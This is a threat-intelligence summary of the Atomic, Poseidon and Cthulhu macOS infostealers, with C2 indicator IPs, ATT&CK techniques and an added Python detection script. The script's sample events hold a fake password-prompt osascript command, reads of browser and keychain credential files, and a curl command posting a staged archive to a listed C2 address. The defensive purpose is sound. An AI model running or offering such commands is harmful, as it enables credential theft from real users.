Stealers on the Rise: A Closer Look at a Growing macOS Threat
Feb. 4, 2025, 6:46 p.m.
Description
This analysis examines the increasing prevalence of macOS infostealers, focusing on three prominent families: Atomic Stealer, Poseidon Stealer, and Cthulhu Stealer. These stealers harvest sensitive data, including financial details, credentials, and intellectual property. The article describes their distribution methods, execution chains, and data exfiltration techniques, and highlights the downstream risk: stolen credentials and session data enable data breaches and follow-on malicious activity. The research reports a 101% increase in macOS infostealer detections from the third to the fourth quarter of 2024. The article also discusses protection measures and mitigations, emphasizing the importance of advanced detection modules and a multi-layered defense strategy.
Date
Published: Feb. 4, 2025, 6:19 p.m.
Created: Feb. 4, 2025, 6:19 p.m.
Modified: Feb. 4, 2025, 6:46 p.m.
Indicators
.142.138.177
194.169.175.117
89.208.103.185
Attack Patterns
Poseidon Stealer
Cthulhu Stealer
Atomic Stealer
T1056.002 (Input Capture: GUI Input Capture)
T1217 (Browser Information Discovery)
T1552.001 (Unsecured Credentials: Credentials In Files)
T1119 (Automated Collection)
T1074 (Data Staged)
T1555.003 (Credentials from Password Stores: Credentials from Web Browsers)
T1566.002 (Phishing: Spearphishing Link)
T1567 (Exfiltration Over Web Service)
T1087 (Account Discovery)
T1555 (Credentials from Password Stores)
T1204.002 (User Execution: Malicious File)
T1059.002 (Command and Scripting Interpreter: AppleScript)
T1005 (Data from Local System)
T1566.001 (Phishing: Spearphishing Attachment)
T1071 (Application Layer Protocol)
T1036 (Masquerading)
T1132 (Data Encoding)
T1027 (Obfuscated Files or Information)
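The technique list above is the part of this report a detection engineer actually consumes. The following is an added example, not code from the article or from the vendor, that turns a subset of those techniques into host-level detection logic and runs it over constructed sample events. The event record shape (process name, command line, optional destination IP, optional file read) is an assumed simplification of what an EDR or the macOS unified log provides; the osascript "hidden answer" dialog, the browser and keychain store paths, and the temp-directory staging pattern are well-known stealer behaviours but are not taken from the page. Only the two complete C2 addresses from the indicator list are used; the first indicator is truncated on the page and is deliberately not guessed.

```python
"""Map macOS host events to the ATT&CK techniques listed for these stealers.

Added illustration; not code from the source article. Event fields are an
assumed, simplified EDR / unified-log record.
"""
import re
from dataclasses import dataclass
from typing import Optional

# The two complete C2 addresses from the indicator list above. The page's
# first indicator is missing its first octet, so it is not included.
C2_IPS = {"194.169.175.117", "89.208.103.185"}

# Well-known secret store locations under a user's home (assumed, not from
# the article): browser credential DBs for T1555.003, keychain for T1555.
BROWSER_SECRET_PATHS = (
    "Library/Application Support/Google/Chrome/",     # Login Data, Cookies
    "Library/Application Support/Firefox/Profiles/",  # logins.json, key4.db
)
KEYCHAIN_PATH = "Library/Keychains/"


@dataclass
class Event:
    """One host event (assumed record shape)."""
    process: str                      # executable name
    cmdline: str                      # full command line
    dst_ip: Optional[str] = None      # remote address if a connection was made
    file_path: Optional[str] = None   # file opened for reading, if any


def classify(ev: Event) -> set:
    """Return the ATT&CK technique IDs this single event is evidence for."""
    hits = set()
    cl = ev.cmdline

    # T1059.002 plus T1056.002: an AppleScript dialog with a hidden answer is
    # the classic fake "macOS needs your password" prompt.
    if ev.process == "osascript":
        hits.add("T1059.002")
        if "display dialog" in cl and "hidden answer" in cl:
            hits.add("T1056.002")

    # T1555.003 / T1555: direct reads of browser or keychain secret stores.
    if ev.file_path:
        if any(p in ev.file_path for p in BROWSER_SECRET_PATHS):
            hits.add("T1555.003")
        if KEYCHAIN_PATH in ev.file_path:
            hits.add("T1555")

    # T1087: local account enumeration via dscl.
    if re.search(r"\bdscl\b.*\s/Users\b", cl):
        hits.add("T1087")

    # T1074: an archiver writing into a temp location (staging before exfil).
    if ev.process in ("zip", "tar", "ditto") and re.search(r"(/private)?/tmp/|\$TMPDIR", cl):
        hits.add("T1074")

    # T1027: a base64 blob decoded straight into an interpreter.
    if re.search(r"base64\s+(-d|-D|--decode)\b", cl) and re.search(r"\|\s*(sh|bash|zsh|osascript)\b", cl):
        hits.add("T1027")

    # T1071: any traffic to a listed C2 address.
    if ev.dst_ip in C2_IPS:
        hits.add("T1071")
    return hits


def scan(events):
    """Classify a batch; keep only (index, techniques) for events with a hit."""
    return [(i, t) for i, ev in enumerate(events) if (t := classify(ev))]


def stealer_chain_present(events) -> bool:
    """True when the core stealer sequence is all present in one batch:
    password prompt, browser credential read, staging, and C2 contact."""
    seen = set()
    for ev in events:
        seen |= classify(ev)
    return {"T1056.002", "T1555.003", "T1074", "T1071"} <= seen


# Constructed sample events for this example (not observed telemetry).
SAMPLE_EVENTS = [
    Event("osascript", "osascript -e 'display dialog \"macOS needs your password to continue\" "
                       "default answer \"\" with title \"System Preferences\" with hidden answer'"),
    Event("Installer", "./Installer",
          file_path="/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"),
    Event("Installer", "./Installer", file_path="/Users/alice/Library/Keychains/login.keychain-db"),
    Event("dscl", "dscl . -list /Users"),
    Event("zip", "zip -r /tmp/out.zip /tmp/stage"),
    Event("curl", 'curl -X POST -F "file=@/tmp/out.zip" http://194.169.175.117/p2p',
          dst_ip="194.169.175.117"),
    Event("ls", "ls -la /Users/alice"),   # benign, should produce no hit
]

if __name__ == "__main__":
    for i, techniques in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i].process:10} -> {sorted(techniques)}")
    print("stealer chain present:", stealer_chain_present(SAMPLE_EVENTS))
```

Each rule on its own is noisy (osascript dialogs and zip in /tmp both have legitimate uses), which is why `stealer_chain_present` correlates across the batch: the combination of a hidden-answer prompt, a browser credential-store read, temp staging and a connection to a listed address within one session is far stronger evidence than any single event, and is the shape a SIEM correlation rule for this report should take.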